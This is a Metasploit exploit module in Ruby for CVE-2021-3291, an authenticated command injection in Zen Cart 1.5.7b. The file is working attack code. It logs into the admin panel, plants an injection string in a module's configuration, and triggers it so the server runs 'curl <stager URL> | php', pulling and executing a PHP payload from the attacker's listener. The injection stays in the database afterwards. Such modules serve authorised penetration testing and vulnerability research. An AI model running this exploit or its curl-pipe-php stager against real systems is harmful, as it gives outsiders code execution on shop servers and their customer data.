##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
#
# This module writes its payload into a Zen Cart module configuration setting
# (persisted in the database) and then re-requests that module's edit page,
# which triggers the command injection in Zen Cart v1.5.7b.
#
###
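##
# Zen Cart 1.5.7b authenticated remote code execution (CVE-2021-3291).
#
# Flow: authenticate to the admin panel -> fetch the edit form of one module
# setting (MODULE/SETTING) -> POST every "True" radio option of that form with
# a command-injection string -> request the edit form again, which triggers the
# injected command. The injected command is `curl <stager URL> | php`, so the
# target must be able to reach this host's HttpServer listener (SRVHOST/SRVPORT)
# and must have both curl and the php CLI available.
#
# Side effect: the injection string is stored in the module configuration of
# the target database and is NOT reverted by this module.
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  # Hidden CSRF field carried by Zen Cart admin forms. The capture stops at the
  # closing quote so it cannot swallow trailing markup the way a greedy `.*` can.
  SECURITY_TOKEN_RE = /<input type="hidden" name="securityToken" value="([^"]*)" \/>/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zen Cart Authenticated Remote Code Execution',
        'Description' => %q(
          This module exploits a command injection in the module settings
          editor of Zen Cart 1.5.7b. Valid admin credentials and the admin
          panel path are required. The injection string is persisted in the
          module configuration stored in the target database and is not
          removed afterwards. The target must be able to reach the HttpServer
          listener on SRVHOST/SRVPORT to fetch the second stage with curl.
        ),
        'License' => MSF_LICENSE,
        'Author' => ['Mucahit Saratar <[email protected]>'], # msf module & research & poc
        'References' => [
          [ 'CVE', '2021-3291' ],
          [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc' ]
        ],
        'Platform' => 'php',
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [ ['Automatic', {}] ],
        'DisclosureDate' => '2021-01-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The payload stays in the module configuration; requests hit the web server logs.
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'Password to login with', '' ]),
        OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/' ]),
        OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment' ]),
        OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger' ]),
        # Zen Cart installs use a renamed admin directory; this default is only an example.
        OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/' ])
      ], self.class
    )
  end

  # Starts the HttpServer listener that hands the real payload to the target.
  #
  # datastore['SSL'] describes the connection to the *target*, but the server
  # mixin also reads it when building the listener and its URL; the injected
  # curl command fetches plain HTTP, so SSL is cleared while the listener is
  # created and restored afterwards. The stager URL is kept in @stager_url.
  def start_server
    target_ssl = datastore['SSL']
    datastore['SSL'] = false if target_ssl
    start_service('Uri' => {
      'Proc' => proc { |cli, req| on_request_uri(cli, req) },
      'Path' => resource_uri
    })
    @stager_url = get_uri
    print_status("Payload is served from #{@stager_url}")
  ensure
    datastore['SSL'] = true if target_ssl
  end

  # Serves the second stage when the target's curl calls back.
  def on_request_uri(cli, _request)
    print_good('First stage executed, sending the second stage of the payload')
    send_response(cli, payload.encoded, { 'Content-Type' => 'text/html' })
  end

  # Builds an admin URI below BASEPATH and TARGETURI.
  def admin_uri(*parts)
    normalize_uri(datastore['BASEPATH'], target_uri.path, *parts)
  end

  # Extracts the securityToken hidden field from an admin page; nil when absent.
  def security_token(body)
    body.to_s[SECURITY_TOKEN_RE, 1]
  end

  # Authenticates to the admin panel.
  #
  # Stores the session cookie in @cookie and returns true when the server
  # answered the login POST with the 302 redirect that follows a successful
  # login, false otherwise (e.g. the form is re-rendered on bad credentials).
  # An unreachable host, an unexpected status or a missing CSRF token abort
  # the module via fail_with.
  def login
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => admin_uri('index.php'),
      'vars_get' => { 'cmd' => 'login', 'camefrom' => 'index.php' }
    )
    fail_with(Failure::Unreachable, 'Could not reach the Zen Cart admin login page') unless res
    fail_with(Failure::UnexpectedReply, "Login page returned HTTP #{res.code} instead of 200") unless res.code == 200

    @cookie = res.get_cookies
    fail_with(Failure::UnexpectedReply, 'Login page did not set a session cookie') if @cookie.empty?
    token = security_token(res.body)
    fail_with(Failure::UnexpectedReply, 'There is no CSRF token in the login page') if token.nil? || token.empty?
    vprint_good("Login CSRF token: #{token}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => admin_uri('index.php'),
      'cookie' => @cookie,
      'vars_get' => { 'cmd' => 'login', 'camefrom' => 'index.php' },
      'vars_post' => {
        'securityToken' => token,
        'action' => "do#{token}",
        'admin_name' => datastore['USERNAME'],
        'admin_pass' => datastore['PASSWORD']
      }
    )
    fail_with(Failure::Unreachable, 'No response to the login request') unless res

    res.code == 302
  end

  # Only confirms that the supplied credentials are accepted; the vulnerable
  # code path itself is not fingerprinted, so a successful login is reported
  # as Appears rather than Vulnerable.
  def check
    return CheckCode::Unknown('Could not authenticate with the supplied credentials') unless login

    CheckCode::Appears('Authenticated to the Zen Cart admin panel')
  end

  def exploit
    unless login
      fail_with(Failure::NoAccess, 'Authentication failed; check USERNAME, PASSWORD and TARGETURI')
    end
    start_server

    module_params = {
      'cmd' => 'modules',
      'set' => datastore['MODULE'],
      'module' => datastore['SETTING']
    }

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => admin_uri('index.php'),
      'vars_get' => module_params.merge('action' => 'edit'),
      'cookie' => @cookie
    )
    fail_with(Failure::UnexpectedReply, 'Module edit page did not return HTTP 200') unless res && res.code == 200

    form_token = security_token(res.body)
    fail_with(Failure::UnexpectedReply, 'securityToken not found in the module edit form') if form_token.nil? || form_token.empty?

    # Every "True" radio option carries the injection string; the remaining
    # select and text fields of the form are submitted as "0", as in the PoC.
    injection = "True','F'); echo `curl #{@stager_url} |php`; //"
    form = { 'securityToken' => form_token }
    res.body.scan(/<input type="radio" name="configuration\[([^\]]+)\]" value="True"/).flatten.each do |key|
      form["configuration[#{key}]"] = injection
    end
    res.body.scan(/<select rel="dropdown" name="configuration\[([^\]]+)\]" class="form-control">/).flatten.each do |key|
      form["configuration[#{key}]"] = '0'
    end
    res.body.scan(/<input type="text" name="configuration\[([^\]]+)\]" value="0" class="form-control" \/>/).flatten.each do |key|
      form["configuration[#{key}]"] = '0'
    end
    # Without a radio option there is nowhere to place the injection.
    fail_with(Failure::NotVulnerable, 'No radio configuration option found in the module edit form') if form.size == 1
    vprint_status("Posting configuration: #{form}")

    send_request_cgi(
      'method' => 'POST',
      'uri' => admin_uri('index.php'),
      'cookie' => @cookie,
      'vars_get' => module_params.merge('action' => 'save'),
      'vars_post' => form
    )

    # Re-requesting the edit page is what the PoC uses to trigger the stored
    # injection; the callback then arrives at on_request_uri.
    send_request_cgi(
      'method' => 'GET',
      'uri' => admin_uri('index.php'),
      'vars_get' => module_params.merge('action' => 'edit'),
      'cookie' => @cookie
    )
  end
end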